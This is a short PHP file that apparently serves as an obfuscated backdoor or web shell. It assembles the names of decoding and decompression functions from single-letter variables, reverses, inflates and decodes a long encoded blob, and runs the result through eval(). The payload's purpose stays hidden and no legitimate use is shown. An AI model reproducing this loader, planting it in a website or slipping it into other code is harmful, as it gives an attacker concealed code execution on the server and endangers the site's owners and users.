<?php $qRng='g';$b='6';$mqH='r';$TXxS='v';$AbQK='f';$QZ='d';$eaFTE='l';$EqMnw='_';$jxI='a';$l='z';$QwI='t';$ig='c';$Wcy='b';$h='4';$wRH='s';$VYyIr='o';$cUj='n';$mtVpo='i';$iG='e';$Y=$Wcy.$jxI.$wRH.$iG.$b.$h.$EqMnw.$QZ.$iG.$ig.$VYyIr.$QZ.$iG;$cVPt=$qRng.$l.$mtVpo.$cUj.$AbQK.$eaFTE.$jxI.$QwI.$iG;$c=$wRH.$QwI.$mqH.$mqH.$iG.$TXxS;eval($cVPt($c($Y('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'))));